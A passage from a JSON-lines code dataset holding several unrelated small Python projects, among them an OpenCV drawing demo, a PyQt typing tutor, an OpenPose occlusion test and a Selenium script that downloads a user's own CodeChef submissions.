training_dataset\n\n\ndef get_sample_dataset(info, sample_path):\n \"\"\" Using information from the info file, load images from the sample file. \"\"\"\n\n sample_dataset = []\n # open with context manager\n with open(sample_path, \"r\") as dataset:\n for character_num in range(len(info[\"characters\"])):\n dataset.seek(info[\"characters\"][character_num][\"position\"] * 8 * 32 * 32)\n current_character = []\n for row in range(32):\n row_string = dataset.read(8 * 32)[:-1]\n row_pixels = row_string.split(\",\")\n row_pixels = list(map(convert_type, row_pixels))\n current_character.append(row_pixels)\n sample_dataset.append(np.array(current_character))\n return sample_dataset\n\n\ndef get_single_character(position, sample_path):\n with open(sample_path, \"r\") as dataset:\n dataset.seek(position * 8 * 32 * 32)\n current_character = []\n for row in range(32):\n row_string = dataset.read(8 * 32)[:-1]\n row_pixels = row_string.split(\",\")\n row_pixels = list(map(convert_type, row_pixels))\n current_character.append(row_pixels)\n\n return current_character\n","repo_name":"alexanderneville/OCR","sub_path":"src/web_application/ocr/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74856685706","text":"\"\"\"Updates statistics and process achievements script\"\"\"\nimport os, sys, getopt\nfrom web import app\nfrom services import AdminNotificationService, OrderService\n\n\nROOT = os.path.dirname(__file__)\n\n# run the application\ndef main(argv):\n \"\"\"main()\"\"\"\n try:\n opts, args = getopt.getopt(argv,\"h\")\n except getopt.GetoptError:\n print('close_market.py -h')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print(\"Close the market\")\n sys.exit(0)\n \n try:\n OrderService.close()\n except Exception as exc:\n AdminNotificationService.notify(str(exc))\n raise exc\n\n AdminNotificationService.notify(\"Market closed!\")\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"ttrnecka/rebbl-stock-market","sub_path":"close_market.py","file_name":"close_market.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"38685373776","text":"from src.application import Application\n\n\ndef write_result_file(write_texts, model_style, acc):\n file = Application.directory['data'] + Application.model_params['system'] + '_' + str(\n Application.model_params['epochs']) + '_' + model_style + '_acc_' + str(acc) + '.csv'\n write_file(file, write_texts)\n\n\ndef write_file(file, texts):\n print(\"write text in file \" + file)\n with open(file, encoding='utf-8', mode='w') as f:\n for i in range(0, len(texts)):\n f.write(texts[i] + '\\n')\n","repo_name":"EcnuHeng/DQD","sub_path":"src/file_util.py","file_name":"file_util.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7749448417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 14 11:47:53 2018\n\n@author: 飯島直也\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n# Create a black image, a window\nimg = np.zeros((300,512,3), np.uint8)\ncv2.namedWindow('image')\n\n# parameter\nradius = 1\ncolor = (0, 0, 0)\n\ndef nothing(x):\n pass\n\ndef draw(event, x, y,flags,param):\n global radius, color\n if event == cv2.EVENT_LBUTTONDOWN:\n cv2.circle(img,(x,y),radius+1,color,-1)\n\n# create trackbars for color change\ncv2.createTrackbar('R','image',0,255,nothing)\ncv2.createTrackbar('G','image',0,255,nothing)\ncv2.createTrackbar('B','image',0,255,nothing)\n\n# create trackbar for setting a radius\ncv2.createTrackbar(\"radius\", 'image',1,100,nothing)\n\ncv2.setMouseCallback('image',draw)\n\nwhile(1):\n cv2.imshow('image',img)\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break\n\n # get current positions of four trackbars\n r = cv2.getTrackbarPos('R','image')\n g = cv2.getTrackbarPos('G','image')\n b = cv2.getTrackbarPos('B','image')\n radius = cv2.getTrackbarPos(\"radius\",'image')\n\n color = (b, g, r)\n\ncv2.destroyAllWindows()","repo_name":"NaoyaIijima/OpencvTutorial","sub_path":"OpenCV_GUIfunc/trackbar.py","file_name":"trackbar.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16574821848","text":"import os\nfrom datetime import datetime\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nfrom enum import Enum\nfrom .signals import signals\nfrom .typing_input_handler import TypingInputHandler\nfrom .ui_settings import config\nfrom ..lessons import Lesson\n\n\nICON_PATH = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n \"images\",\n config.get(\"main_window\", \"icon\")\n)\n\n\nclass TypingState(Enum):\n UNSTARTED = 1\n TYPING = 2\n FINISHED = 3\n\n\nclass TypingWidget(QtWidgets.QTextEdit):\n chars_per_word = config.getint(\"typing_widget\", \"chars_per_word\")\n\n def __init__(self, parent):\n super().__init__(\"\", parent)\n self.typing_state = TypingState.UNSTARTED\n self.set_font()\n self.create_timers()\n self.connect_signals()\n self.set_disabled()\n self.typing_input_handler = TypingInputHandler()\n self.refresh()\n\n def set_font(self):\n font_name = config.get(\"typing_widget\", \"font_name\")\n font_size = config.getint(\"typing_widget\", \"font_size\")\n font = QtGui.QFont(font_name, font_size, QtGui.QFont.Monospace)\n self.setFont(font)\n\n def create_timers(self):\n self.countdown_timer = QtCore.QTimer()\n self.typing_timer = QtCore.QTimer()\n self.countdown_timer.setInterval(1000)\n self.typing_timer.setInterval(1000)\n\n def connect_signals(self):\n signals.lesson_selected.connect(self.set_target_text)\n signals.start_countdown.connect(self.start_countdown)\n self.countdown_timer.timeout.connect(self.countdown)\n signals.disable_typing.connect(lambda: self.set_disabled(True))\n stats_methods = [\n self.show_typing_time,\n self.show_wpm,\n self.show_accuracy\n ]\n for method in stats_methods:\n self.typing_timer.timeout.connect(method)\n\n def start_countdown(self):\n if self.enable_typing_in <= 0:\n self.start_typing()\n return\n\n self.enable_typing_in = config.getint(\"typing_widget\", \"countdown\")\n signals.update_countdown.emit(self.enable_typing_in)\n self.countdown_timer.start()\n\n def countdown(self):\n self.enable_typing_in -= 1\n signals.update_countdown.emit(self.enable_typing_in)\n if self.enable_typing_in <= 0:\n self.start_typing()\n\n def start_typing(self):\n if self.typing_state != TypingState.FINISHED:\n self._last_keypress_time = datetime.now()\n self.countdown_timer.stop()\n self.set_disabled(False)\n signals.status_update.emit(\"Start typing...\")\n self.typing_state = TypingState.TYPING\n else:\n self.set_disabled(True)\n signals.status_update.emit(\"Finished exercise...\")\n\n def show_typing_time(self):\n self.typing_time += 1\n signals.update_typing_time.emit(self.typing_time)\n # pause the lesson if more than X seconds has elapsed since keystroke\n if self._last_keypress_time is not None:\n if (datetime.now() - self._last_keypress_time).seconds >= 10:\n self.set_disabled()\n msg = QtWidgets.QMessageBox()\n msg.setIcon(QtWidgets.QMessageBox.Information)\n msg.setWindowIcon(QtGui.QIcon(ICON_PATH))\n msg.setText(\"Press Start To Resume\")\n msg.setWindowTitle(\"Lesson Paused\")\n msg.exec_()\n\n def show_wpm(self):\n len_entered = len(self.typing_input_handler.entered_text)\n words_typed = len_entered / self.chars_per_word\n minutes_passed = (self.typing_time / 60)\n self.wpm = int(words_typed / minutes_passed)\n signals.update_wpm.emit(self.wpm)\n\n def show_accuracy(self):\n signals.update_accuracy.emit(self.typing_input_handler.accuracy)\n\n @QtCore.pyqtSlot(bool)\n def set_disabled(self, disabled=True):\n self.setDisabled(disabled)\n if disabled:\n self.typing_timer.stop()\n if self.typing_state is TypingState.TYPING:\n signals.status_update.emit(\"Paused...\")\n else:\n self.typing_timer.start()\n self.setFocus()\n\n def refresh(self):\n self.typing_input_handler.refresh()\n self._last_keypress_time = None\n self.enable_typing_in = config.getint(\"typing_widget\", \"countdown\")\n self.countdown_timer.stop()\n self.typing_timer.stop()\n\n self.typing_time = 0\n self.wpm = 0\n signals.update_countdown.emit(self.enable_typing_in)\n signals.update_typing_time.emit(self.typing_time)\n signals.update_wpm.emit(self.wpm)\n signals.update_accuracy.emit(self.typing_input_handler.accuracy)\n self.typing_state = TypingState.UNSTARTED\n\n @QtCore.pyqtSlot(str)\n def set_target_text(self, lesson_name):\n self.refresh()\n lesson = self._lesson = Lesson.get_lesson_by_name(lesson_name)\n self.typing_input_handler.refresh(lesson_name, lesson.content)\n self.update_display()\n signals.status_update.emit(\"Ready.\")\n self.setDisabled(True)\n\n def keyPressEvent(self, event):\n self._last_keypress_time = datetime.now()\n if self.typing_state is not TypingState.TYPING:\n return\n self.update_display(event)\n\n def update_display(self, event=None):\n if event is not None:\n self.typing_input_handler.process_key_press(event)\n self.setText(self.typing_input_handler.display_text)\n\n len_entered = len(self.typing_input_handler.entered_text)\n cursor = self.textCursor()\n cursor.setPosition(len_entered, QtGui.QTextCursor.MoveAnchor)\n self.setTextCursor(cursor)\n\n scrollbar = self.verticalScrollBar()\n current_position = scrollbar.sliderPosition()\n scrollbar_increment = 200\n if current_position > 0 or cursor.position() > 200:\n new_position = scrollbar.sliderPosition() + scrollbar_increment\n scrollbar.setSliderPosition(new_position)\n\n if self.typing_input_handler.finished:\n self.typing_state = TypingState.FINISHED\n self.typing_timer.stop()\n self.set_disabled(True)\n signals.status_update.emit(\"Finished exercise...\")\n signals.update_database_lessons_stats.emit(self._lesson.name)\n","repo_name":"simongarisch/pytypist","sub_path":"pytypist/ui/typing_widget.py","file_name":"typing_widget.py","file_ext":"py","file_size_in_byte":6350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11506100577","text":"from pyfiglet import Figlet\nimport sys\nimport random\n\nfiglet = Figlet()\n\nfonts = figlet.getFonts()\nmodes = [\"-f\", \"--font\"]\n\nargc = len(sys.argv)\n\nif argc == 1:\n rand = random.randrange(0, len(fonts))\n figlet.setFont(font=fonts[rand])\n\n ans = input(\"Input: \")\n\n print(\"Output:\")\n print(figlet.renderText(ans))\n\nelif argc == 3:\n mode = sys.argv[1]\n font = sys.argv[2]\n\n if mode not in modes:\n print(\"Invalid usage\")\n sys.exit(1)\n\n if font not in fonts:\n print(\"Invalid usage\")\n sys.exit(1)\n\n\n figlet.setFont(font=font)\n\n ans = input(\"Input: \")\n\n print(\"Output:\")\n print(figlet.renderText(ans))\n\nelse:\n print(\"Invalid usage\")\n sys.exit(1)\n\n","repo_name":"Sanvals/CS50P","sub_path":"Week4/figlet/figlet.py","file_name":"figlet.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12956882059","text":"import pandas as pd\nimport numpy as np\nimport csv\nimport sys\n\nfrom utilities.process_csv import *\nfrom utilities.print_visualize_funcs import *\n\n# filesList= [\"../data/1_parameter/Batch_Size.tsv\", \"../data/1_parameter/Buffer_Memory.tsv\", \"../data/1_parameter/Linger_Ms.tsv\", \\\n# \"../data/1_parameter/Max_Request_Size.tsv\", \"../data/1_parameter/Message_Size.tsv\", \"../data/2_parameters/Batch_Size+Buffer_Memory.tsv\",\n# \"../data/2_parameters/Batch_Size+Linger_Ms.tsv\", \"../data/2_parameters/Batch_Size+Max_Request_Size.tsv\", \"../data/2_parameters/Buffer_Memory+Linger_Ms.tsv\", \n# \"../data/2_parameters/Linger_Ms+Max_Request_Size.tsv\"]\n\n\nif __name__ == '__main__':\n pd.set_option('display.max_rows', 500)\n pd.set_option('display.max_columns', 900)\n \n if len(sys.argv) < 3:\n print(\"Not enough arguments. Program needs 4(1+3) arguments, but you gave {}.\".format(len(sys.argv)))\n sys.exit(1)\n \n target = sys.argv[1]\n dataFile = sys.argv[2]\n print(\"Target: {}\".format(target))\n print(\"File: {}\".format(dataFile))\n\n data = readCSVpd(dataFile)\n\n # group data \n # data1 = data[data['Replication Factor'] == 1]\n # data2 = data[data['Replication Factor'] == 2]\n # data5 = data[data['Replication Factor'] == 5]\n\n # figData = (data1, data2, data5)\n # colors = (\"red\", \"green\", \"blue\")\n # groups = (\"Replication Factor 1\", \"Replication Factor 2\", \"Replication Factor 5\")\n\n # plt.figure(figsize=(16, 8))\n \n # for figData, color, group in zip(figData, colors, groups):\n # x, y = figData[feature], figData[target]\n # plt.scatter(x, y, c=color, edgecolors='none', s=15, label=group)\n\n features = data.columns.tolist()\n features.remove(target)\n\n for feature in features:\n scatter_plot(data, target, feature)\n # plt.show()\n\n\n \n \n\n\n\n\n\n\n \n\n \n\n\n\n\n\n\n \n\n ","repo_name":"GiannisKalopisis/Adjustable-pub-sub-system","sub_path":"ML/visualize/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"36983986266","text":"from math import ceil\n\n\ncharToIndex = {\n \"F\": 0,\n \"B\": 1,\n \"R\": 1,\n \"L\": 0\n}\n\ndef main():\n input_data = []\n with open(\"input.txt\") as input:\n for line in input:\n input_data.append(line.strip())\n \n input_data = input_data[:-1]\n \n seat_locations = []\n seat_ids = []\n for line in input_data:\n min_row = 0\n max_row = 127\n row = 0\n min_column = 0\n max_column = 7\n column = 0\n row_designators = line[0:7]\n column_designators = line[-3:]\n for designator in row_designators:\n index = charToIndex[designator]\n if index == 0:\n max_row -= ceil((max_row - min_row) / 2)\n row = max_row\n else:\n min_row += ceil((max_row - min_row) / 2)\n row = min_row\n\n for designator in column_designators:\n index = charToIndex[designator]\n if index == 0:\n max_column -= ceil((max_column - min_column) / 2)\n column = max_column\n else:\n min_column += ceil((max_column - min_column) / 2)\n column = min_column\n \n seat_locations.append((row, column))\n seat_ids.append(row * 8 + column)\n\n print(\"Highest seat id (p1): {}\".format(max(seat_ids)))\n \n rows_with_empty_seats = []\n for i in range(1, 127):\n used_seats = []\n for row, column in seat_locations:\n if row == i:\n used_seats.append(column)\n\n if len(used_seats) < 8:\n rows_with_empty_seats.append((i, used_seats))\n\n for row_data in rows_with_empty_seats:\n row, seats = row_data\n if len(seats) > 0:\n seats.sort()\n seat_offset = seats[0]\n for index, seat in enumerate(seats):\n if index + seat_offset != seat:\n print(\"My seat id (p2): {}\".format(8 * row + index))\n break\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"davidskeck/advent-of-code","sub_path":"AOC_2020/five/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17659287364","text":"import pose_utils\nimport os\nimport numpy as np\n\nfrom keras.models import load_model\nimport skimage.transform as st\nimport pandas as pd\nfrom tqdm import tqdm\nfrom numpy.random import shuffle\nfrom skimage.transform import resize\nfrom scipy.ndimage import gaussian_filter\nfrom skimage.io import imsave, imread\n\nfrom time import time\n\nfrom imageio import get_reader\nfrom pose_utils import draw_pose_from_cords\n\nfrom skimage.draw import polygon\n\nmapIdx = [[31,32], [39,40], [33,34], [35,36], [41,42], [43,44], [19,20], [21,22],\n [23,24], [25,26], [27,28], [29,30], [47,48], [49,50], [53,54], [51,52],\n [55,56], [37,38], [45,46]]\n\nlimbSeq = [[2,3], [2,6], [3,4], [4,5], [6,7], [7,8], [2,9], [9,10],\n [10,11], [2,12], [12,13], [13,14], [2,1], [1,15], [15,17],\n [1,16], [16,18], [3,17], [6,18]]\n\nthreshold = 0.1\nboxsize = 368\nscale_search = [0.5, 1, 1.5, 2]\n\n\ndef compute_cordinates(heatmap_avg, paf_avg, oriImg, th1=0.1, th2=0.05):\n all_peaks = []\n peak_counter = 0\n\n for part in range(18):\n map_ori = heatmap_avg[:,:,part]\n map = gaussian_filter(map_ori, sigma=3)\n\n map_left = np.zeros(map.shape)\n map_left[1:,:] = map[:-1,:]\n map_right = np.zeros(map.shape)\n map_right[:-1,:] = map[1:,:]\n map_up = np.zeros(map.shape)\n map_up[:,1:] = map[:,:-1]\n map_down = np.zeros(map.shape)\n map_down[:,:-1] = map[:,1:]\n\n peaks_binary = np.logical_and.reduce((map>=map_left, map>=map_right, map>=map_up, map>=map_down, map > th1))\n peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0])) # note reverse\n\n peaks_with_score = [x + (map_ori[x[1],x[0]],) for x in peaks]\n id = list(range(peak_counter, peak_counter + len(peaks)))\n peaks_with_score_and_id = [peaks_with_score[i] + (id[i],) for i in range(len(id))]\n\n all_peaks.append(peaks_with_score_and_id)\n peak_counter += len(peaks)\n\n connection_all = []\n special_k = []\n mid_num = 10\n\n for k in range(len(mapIdx)):\n score_mid = paf_avg[:,:,[x-19 for x in mapIdx[k]]]\n candA = all_peaks[limbSeq[k][0]-1]\n candB = all_peaks[limbSeq[k][1]-1]\n nA = len(candA)\n nB = len(candB)\n indexA, indexB = limbSeq[k]\n if(nA != 0 and nB != 0):\n connection_candidate = []\n for i in range(nA):\n for j in range(nB):\n vec = np.subtract(candB[j][:2], candA[i][:2])\n norm = np.sqrt(vec[0]*vec[0] + vec[1]*vec[1])\n vec = np.divide(vec, norm)\n\n startend = list(zip(np.linspace(candA[i][0], candB[j][0], num=mid_num),\n np.linspace(candA[i][1], candB[j][1], num=mid_num)))\n\n vec_x = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 0]\n for I in range(len(startend))])\n vec_y = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 1]\n for I in range(len(startend))])\n\n score_midpts = np.multiply(vec_x, vec[0]) + np.multiply(vec_y, vec[1])\n score_with_dist_prior = sum(score_midpts)/len(score_midpts) + min(0.5*oriImg.shape[0]/norm-1, 0)\n criterion1 = len(np.nonzero(score_midpts > th2)[0]) > 0.8 * len(score_midpts)\n criterion2 = score_with_dist_prior > 0\n if criterion1 and criterion2:\n connection_candidate.append([i, j, score_with_dist_prior, score_with_dist_prior+candA[i][2]+candB[j][2]])\n\n connection_candidate = sorted(connection_candidate, key=lambda x: x[2], reverse=True)\n connection = np.zeros((0,5))\n for c in range(len(connection_candidate)):\n i,j,s = connection_candidate[c][0:3]\n if(i not in connection[:,3] and j not in connection[:,4]):\n connection = np.vstack([connection, [candA[i][3], candB[j][3], s, i, j]])\n if(len(connection) >= min(nA, nB)):\n break\n\n connection_all.append(connection)\n else:\n special_k.append(k)\n connection_all.append([])\n\n # last number in each row is the total parts number of that person\n # the second last number in each row is the score of the overall configuration\n subset = -1 * np.ones((0, 20))\n candidate = np.array([item for sublist in all_peaks for item in sublist])\n\n for k in range(len(mapIdx)):\n if k not in special_k:\n partAs = connection_all[k][:,0]\n partBs = connection_all[k][:,1]\n indexA, indexB = np.array(limbSeq[k]) - 1\n\n for i in range(len(connection_all[k])): #= 1:size(temp,1)\n found = 0\n subset_idx = [-1, -1]\n for j in range(len(subset)): #1:size(subset,1):\n if subset[j][indexA] == partAs[i] or subset[j][indexB] == partBs[i]:\n subset_idx[found] = j\n found += 1\n\n if found == 1:\n j = subset_idx[0]\n if(subset[j][indexB] != partBs[i]):\n subset[j][indexB] = partBs[i]\n subset[j][-1] += 1\n subset[j][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2]\n elif found == 2: # if found 2 and disjoint, merge them\n j1, j2 = subset_idx\n print(\"found = 2\")\n membership = ((subset[j1]>=0).astype(int) + (subset[j2]>=0).astype(int))[:-2]\n if len(np.nonzero(membership == 2)[0]) == 0: #merge\n subset[j1][:-2] += (subset[j2][:-2] + 1)\n subset[j1][-2:] += subset[j2][-2:]\n subset[j1][-2] += connection_all[k][i][2]\n subset = np.delete(subset, j2, 0)\n else: # as like found == 1\n subset[j1][indexB] = partBs[i]\n subset[j1][-1] += 1\n subset[j1][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2]\n\n # if find no partA in the subset, create a new subset\n elif not found and k < 17:\n row = -1 * np.ones(20)\n row[indexA] = partAs[i]\n row[indexB] = partBs[i]\n row[-1] = 2\n row[-2] = sum(candidate[connection_all[k][i,:2].astype(int), 2]) + connection_all[k][i][2]\n subset = np.vstack([subset, row])\n\n # delete some rows of subset which has few parts occur\n deleteIdx = [];\n for i in range(len(subset)):\n if subset[i][-1] < 4 or subset[i][-2]/subset[i][-1] < 0.4:\n deleteIdx.append(i)\n subset = np.delete(subset, deleteIdx, axis=0)\n\n if len(subset) == 0:\n return np.array([[-1, -1]] * 18).astype(int)\n\n cordinates = []\n result_image_index = np.argmax(subset[:, -2])\n\n for part in subset[result_image_index, :18]:\n if part == -1:\n cordinates.append([-1, -1])\n else:\n Y = candidate[part.astype(int), 0]\n X = candidate[part.astype(int), 1]\n cordinates.append([X, Y])\n return np.array(cordinates).astype(int)\n\n\n#def cordinates_from_image_file(image_name, model):\n# oriImg = imread(image_name)[:, :, ::-1] # B,G,R order\ndef cordinates_from_image_file(image, model):\n oriImg = image[:, :, ::-1]\n\n multiplier = [x * boxsize / oriImg.shape[0] for x in scale_search]\n\n heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 19))\n paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38))\n\n for m in range(len(multiplier)):\n scale = multiplier[m]\n\n new_size = (np.array(oriImg.shape[:2]) * scale).astype(np.int32)\n imageToTest = resize(oriImg, new_size, order=3, preserve_range=True)\n imageToTest_padded = imageToTest[np.newaxis, :, :, :]/255 - 0.5\n\n output1, output2 = model.predict(imageToTest_padded)\n\n heatmap = st.resize(output2[0], oriImg.shape[:2], preserve_range=True, order=1)\n paf = st.resize(output1[0], oriImg.shape[:2], preserve_range=True, order=1)\n heatmap_avg += heatmap\n paf_avg += paf\n\n heatmap_avg /= len(multiplier)\n pose_cords = compute_cordinates(heatmap_avg, paf_avg, oriImg=oriImg)\n return pose_cords\n\n# Estimate 2D-pose for a single image\n# output np array coordinates and color images\ndef estimate_all(folder, model):\n if not os.path.isdir(folder):\n print('Warning: Directory does not exist...')\n return\n\n pose_folder = folder.replace('images', 'poses')\n if os.path.isdir(pose_folder):\n print('Cached poses found')\n else:\n os.mkdir(pose_folder)\n image_list = [name for name in os.listdir(folder) if name.endswith('.jpg')]\n for name in tqdm(image_list):\n im_name = os.path.join(folder, name)\n img = imread(im_name)\n pose_cords = np.array(cordinates_from_image_file(img, model=model))\n new_path = im_name.replace(folder, pose_folder)\n color, _ = pose_utils.draw_pose_from_cords(pose_cords, (256,256))\n imsave(new_path, color)\n new_path = new_path.replace('.jpg', '.pose.npy')\n np.save(new_path, pose_cords)\n\n return pose_folder\n\n# Make bad examples by cutting some limbs\ndef make_bad_images(image_folder, bad_image_folder, limbs, cut_width = 5):\n if not os.path.exists(bad_image_folder):\n os.mkdir(bad_image_folder)\n\n pose_folder = image_folder.replace('images', 'poses')\n assert(os.path.exists(pose_folder))\n\n image_list = [name for name in os.listdir(image_folder) if name.endswith('.jpg')]\n for name in tqdm(image_list):\n img = imread(os.path.join(image_folder, name))\n pose = np.load(os.path.join(pose_folder, name.replace('.jpg','.pose.npy')))\n bad_im_name = os.path.join(bad_image_folder, name)\n amputate_limbs(img, pose, bad_im_name, limbs, cut_width)\n\n# Amputate limbs by drawing a black bar at middle point of the bone\n# input:\n# @ An image of 256*256\n# @ A corresponding pose locations\n# @ limbs: lthigh, rthigh, lshin, rshin\n\n\nlimbjoints = {'lthigh': (8,9), 'lshin': (9,10), 'rthigh': (11,12), 'rshin': (12,13), 'larm': (2,3), 'rarm': (5,6)}\n\ndef amputate_limbs(img, pose, bad_im_name, limbs, bar_width, half_bar_length=20):\n pose = pose.astype(np.float)\n for name in limbs:\n joints = limbjoints[name]\n if any(pose[joints, 0] == -1):\n continue\n \n midpoint = np.sum(pose[joints, :], axis=0) / 2\n direction = np.squeeze(np.array([[1, -1]]) @ pose[joints, :]) # equivalent to p[0] - p[1]\n length = np.sqrt(direction[0] ** 2 + direction[1] ** 2)\n direction /= length\n norm_vec = np.array([direction[1], -direction[0]])\n\n rects = np.stack([midpoint - norm_vec * half_bar_length - direction * bar_width,\n midpoint - norm_vec * half_bar_length + direction * bar_width,\n midpoint + norm_vec * half_bar_length + direction * bar_width,\n midpoint + norm_vec * half_bar_length - direction * bar_width,\n midpoint - norm_vec * half_bar_length - direction * bar_width]).astype(int)\n rr, cc = polygon(rects[:, 0], rects[:, 1], shape=(256,256))\n rr = np.minimum(np.maximum(rr, 0), 255)\n cc = np.minimum(np.maximum(cc, 0), 255)\n # use opposite color from the middle point\n midpoint = midpoint.astype(int)\n rgb = img[midpoint[0], midpoint[1]]\n img[rr, cc, :] = 255 - rgb\n\n imsave(bad_im_name, img)\n\n\ndef calculate_missing_rate(pose_folder, bad_pose_folder, dataset_name):\n pose_list = [name for name in os.listdir(pose_folder) if name.endswith('.pose.npy')]\n total_num = len(pose_list)\n rate = 0\n with open('bad_pose_list.txt', 'w') as file:\n for item in pose_list:\n good_pose = np.load(os.path.join(pose_folder, item))\n bad_pose = np.load(os.path.join(bad_pose_folder, item))\n miss_point = any(good_pose[i, 0] >= 0 and bad_pose[i, 0] == -1 for i in range(18))\n if miss_point:\n rate += 1\n file.write('{}\\n'.format(item))\n\n return {dataset_name: rate / total_num}\n\nif __name__ == \"__main__\":\n\n # image_folder = 'D:/data/ntu_image_skeleton/all'\n # list = sorted([name for name in os.listdir(image_folder) if name.endswith('.jpg')])\n # number = 200\n # list = list[0:number]\n # dest_folder = 'D:/Yanglingbo_Workspace_new/Projects/Python/TensorFlow/pose-estimator-test/good_ntu_images'\n #\n # from shutil import copyfile\n # for item in list:\n # copyfile(os.path.join(image_folder, item),\n # os.path.join(dest_folder, item))\n\n image_folder = 'good_ntu_images'\n model = load_model('./pose_estimator.h5')\n pose_folder = estimate_all(image_folder, model)\n bad_image_folder = image_folder.replace('good', 'bad')\n make_bad_images(image_folder, bad_image_folder, limbs = ['larm', 'rarm', 'lthigh', 'rthigh'], cut_width = 8)\n bad_pose_folder = estimate_all(bad_image_folder, model)\n rate = calculate_missing_rate(pose_folder, bad_pose_folder, 'ntu')\n for k, v in rate.items():\n print('{} missing rate: {:.3f}'.format(k, v))\n","repo_name":"Lotayou7355608/openpose-occlusion-test","sub_path":"pose_estimator_test.py","file_name":"pose_estimator_test.py","file_ext":"py","file_size_in_byte":13560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34973523386","text":"from selenium import webdriver\nimport time\nimport os\nfrom selenium.common.exceptions import NoSuchElementException\nimport getpass\nimport tkinter as tk\n\nuser_name = input('Enter Your Handle / Email: ')\nuser_password = getpass.getpass()\nwait_time = 2\nuser_to_download = user_name\n\n\ndef getClipboardText():\n root = tk.Tk()\n # keep the window from showing\n root.withdraw()\n return root.clipboard_get()\n\n\ndef get_extension(language):\n if 'C++' in language:\n return '.cpp'\n elif 'JAVA' in language:\n return '.java'\n elif 'PYTH' in language:\n return '.py'\n elif 'C' in language:\n return '.c'\n else:\n return '.txt'\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--ignore-certificate-errors')\noptions.add_argument(\"--test-type\")\n\ndriver = webdriver.Chrome(chrome_options=options)\n\n# logging in\n\nprint(\"Logging in\")\n\ndriver.get(\"https://www.codechef.com/\")\nuserForm = driver.find_element_by_name('name')\npasswordForm = driver.find_element_by_name('pass')\nuserForm.send_keys(user_name)\npasswordForm.send_keys(user_password)\ndriver.find_element_by_name('op').click()\ntime.sleep(wait_time)\n\n\nif driver.current_url == \"https://www.codechef.com/\":\n print(\"Login failed\")\n driver.quit()\n exit(0)\n\nif driver.current_url == \"https://www.codechef.com/session/limit\":\n boxes = driver.find_elements_by_class_name('form-checkbox')\n for i in range(len(boxes) - 1):\n boxes[i].click()\n driver.find_element_by_name('op').click()\n\n\ndriver.get(\"https://www.codechef.com/users/\" + user_to_download)\nsubmissions = driver.find_elements_by_tag_name('a')\nlinks = []\nfor submission in submissions:\n link = submission.get_attribute('href')\n if link is not None and link.endswith(user_to_download):\n links.append(link)\n # print(link)\n\ncompleted = 0\nfor link in links:\n driver.get(link)\n time.sleep(wait_time)\n try:\n verdicts = driver.find_elements_by_xpath(\n '//*[@id=\"primary-content\"]/div/div[3]/table/tbody/tr/td[4]/span')\n source_links = driver.find_elements_by_xpath(\n '//*[@id=\"primary-content\"]/div/div[3]/table/tbody/tr/td[8]/ul/li/a')\n languages = driver.find_elements_by_xpath(\n '//*[@id=\"primary-content\"]/div/div[3]/table/tbody/tr/td[7]')\n except:\n print(\"Error Occured in submission page\")\n problemName = \"\"\n sourceCode = \"\"\n probableProblemNameLinks = driver.find_elements_by_xpath(\n '//*[@id=\"breadcrumb\"]/div/a')\n for probableProblemNameLink in probableProblemNameLinks:\n if \"problems\" in probableProblemNameLink.get_attribute('href'):\n problemName = probableProblemNameLink.text.replace('?', '')\n assert(len(verdicts) == len(source_links))\n\n for i in range(len(verdicts)):\n if verdicts[i].get_attribute('title') == \"accepted\" or \"100\" in verdicts[i].text:\n\n language = languages[i].text\n directory = os.path.join(\n os.getcwd(), 'CodeChef ' + user_to_download)\n path = os.path.join(directory, problemName +\n get_extension(language))\n if os.path.exists(path) == False:\n try:\n driver.get(source_links[i].get_attribute('href'))\n time.sleep(wait_time)\n driver.find_element_by_id(\n 'copy-button').click()\n sourceCode = getClipboardText()\n except:\n print(\"Error Occured in source code page\")\n else:\n print(problemName + \" Already Downlaoded\")\n if len(problemName) > 0 and len(sourceCode) > 0:\n if not os.path.exists(directory):\n os.makedirs(directory)\n f = open(path, 'w+')\n f.write(sourceCode)\n f.close()\n break\n completed += 1\n print('Download completed: ' + str(float(\"%0.2f\" %\n ((completed * 100) / len(links)))) + 